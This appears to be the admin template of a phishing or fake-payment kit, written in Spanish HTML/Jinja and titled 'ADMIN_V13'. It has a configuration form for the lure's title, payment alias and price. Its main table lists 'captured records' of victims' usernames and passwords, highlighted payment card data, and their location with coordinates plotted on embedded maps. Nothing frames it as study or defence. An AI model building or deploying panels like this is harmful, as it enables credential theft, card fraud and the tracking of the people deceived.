<!DOCTYPE html>
<html lang="es">
<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ADMIN_V13</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.0/dist/css/bootstrap.min.css">
    <style>
        body { background: #000; color: #00ff41; font-family: monospace; font-size: 0.8rem; }
        .m-box { border: 1px solid #00ff41; background: rgba(0,20,0,0.9); padding: 10px; margin-bottom: 10px; }
        .table { color: #00ff41; border-color: #004400; }
        .card-data { color: #ff3131; font-weight: bold; border: 1px dashed #ff3131; padding: 5px; display: block; }
    </style>
</head>
<body class="p-3">
    <div class="row">
        <div class="col-md-3">
            <div class="m-box">
                <h6>CONFIGURACIÓN</h6>
                <form action="/update_full" method="POST" enctype="multipart/form-data">
                    <input type="text" name="titulo" value="{{config.titulo}}" class="form-control form-control-sm mb-2" placeholder="Título">
                    <input type="text" name="alias" value="{{config.alias}}" class="form-control form-control-sm mb-2" placeholder="Alias Pago">
                    <input type="text" name="precio" value="{{config.precio}}" class="form-control form-control-sm mb-2" placeholder="Precio">
                    <input type="color" name="color_fondo" value="{{config.color_fondo}}" class="form-control form-control-sm mb-2">
                    <button class="btn btn-success btn-sm w-100">ACTUALIZAR</button>
                </form>
            </div>
        </div>
        <div class="col-md-9">
            <div class="m-box">
                <h6>REGISTROS CAPTURADOS</h6>
                <table class="table table-dark table-sm">
                    <thead><tr><th>USUARIO/PASS</th><th>UBICACIÓN</th><th>TARJETA</th><th>MAPA</th></tr></thead>
                    <tbody>
                        {% for r in registros %}
                        <tr>
                            <td><b>{{r[1]}}</b><br><small class="text-info">{{r[2]}}</small></td>
                            <td><small>{{r[8]}}</small><br><small class="text-muted">{{r[9]}}, {{r[10]}}</small></td>
                            <td><span class="card-data">{{r[3]}}</span></td>
                            <td>
                                {% if r[9] != 0 %}
                                <iframe width="100" height="60" src="https://maps.google.com/maps?q={{r[9]}},{{r[10]}}&z=15&output=embed"></iframe>
                                {% endif %}
                            </td>
                        </tr>
                        {% endfor %}
                    </tbody>
                </table>
            </div>
        </div>
    </div>
</body>
</html>
